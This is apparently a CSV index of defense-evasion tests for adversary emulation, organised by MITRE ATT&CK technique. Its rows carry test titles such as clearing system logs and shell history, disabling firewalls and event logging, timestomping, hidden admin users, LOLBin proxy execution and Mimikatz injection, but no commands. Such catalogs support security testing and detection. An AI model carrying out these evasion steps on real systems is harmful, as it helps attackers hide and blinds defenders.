defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1564,Hide Artifacts,4,Create and Hide a Service with sc.exe,333c7de0-6fbe-42aa-ac2b-c7e40b18246a,command_prompt
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,2,Delete log files using built-in log utility,653d39cd-bae7-499a-898c-9fb96b8b5cd1,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,3,Truncate system log files via truncate utility,6290f8a8-8ee9-4661-b9cf-390031bf6973,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,4,Delete log files via cat utility by appending /dev/null or /dev/zero,c23bdb88-928d-493e-b46d-df2906a50941,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,5,System log file deletion via find utility,bc8eeb4a-cc3e-45ec-aa6e-41e973da2558,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,6,Overwrite macOS system log via echo utility,0208ea60-98f1-4e8c-8052-930dce8f742c,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,7,Real-time system log clearance/deletion,848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,8,Delete system log files via unlink utility,03013b4b-01db-437d-909b-1fdaa5010ee8,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,9,Delete system log files using shred utility,86f0e4d5-3ca7-45fb-829d-4eda32b232bb,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,10,Delete system log files using srm utility,b0768a5e-0f32-4e75-ae5b-d036edcf96b6,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,11,Delete system log files using OSAScript,810a465f-cd4f-47bc-b43e-d2de3b033ecc,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,12,Delete system log files using Applescript,e62f8694-cbc7-468f-862c-b10cd07e1757,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,13,Delete system journal logs via rm and journalctl utilities,ca50dd85-81ff-48ca-92e1-61f119cb1dcf,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,14,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,15,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,4,InstallUtil Install method call,9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,5,InstallUtil Uninstall method call - /U variant,34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
defense-evasion,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1553.001,Subvert Trust Controls: Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
defense-evasion,T1562,Impair Defenses,2,Disable journal logging via systemctl utility,c3a377f9-1203-4454-aa35-9d391d34768f,sh
defense-evasion,T1562,Impair Defenses,3,Disable journal logging via sed utility,12e5551c-8d5c-408e-b3e4-63f53b03379f,sh
defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,1,Copy and Delete Mailbox Data on Windows,d29f01ea-ac72-4efc-8a15-bea64b77fabf,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,2,Copy and Delete Mailbox Data on Linux,25e2be0e-96f7-4417-bd16-a4a2500e3802,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,3,Copy and Delete Mailbox Data on macOS,3824130e-a6e4-4528-8091-3a52eeb540f6,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,4,Copy and Modify Mailbox Data on Windows,edddff85-fee0-499d-9501-7d4d2892e79b,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,5,Copy and Modify Mailbox Data on Linux,6d99f93c-da56-49e3-b195-163090ace4f6,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,6,Copy and Modify Mailbox Data on macOS,8a0b1579-5a36-483a-9cde-0236983e1665,bash
defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
defense-evasion,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,2,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,3,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,6,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,9,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,10,Lolbin Gpscript logon option,5bcda9cd-8e85-48fa-861d-b5a85d91d48c,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
defense-evasion,T1620,Reflective Code Loading,1,WinPwn - Reflectively load Mimik@tz into memory,56b9589c-9170-4682-8c3d-33b86ecb5119,powershell
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,2,Disable Windows IIS HTTP Logging via PowerShell,a957fb0f-1e85-49b2-a211-413366784b1e,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,3,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,7,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,10,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,11,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,12,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall main configuration file,7b697ece-8270-46b5-bbc7-6b9e27081831,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Tail the UFW firewall log file,419cca0c-fa52-4572-b0d7-bc7c6f388a27,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,16,Disable iptables,7784c64e-ed0b-4b65-bf63-c86db229fd56,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,17,Modify/delete iptables firewall rules,899a7fb5-d197-4951-8614-f19ac4a73ad4,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,18,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,19,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
defense-evasion,T1112,Modify Registry,33,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
defense-evasion,T1112,Modify Registry,45,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
defense-evasion,T1112,Modify Registry,47,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
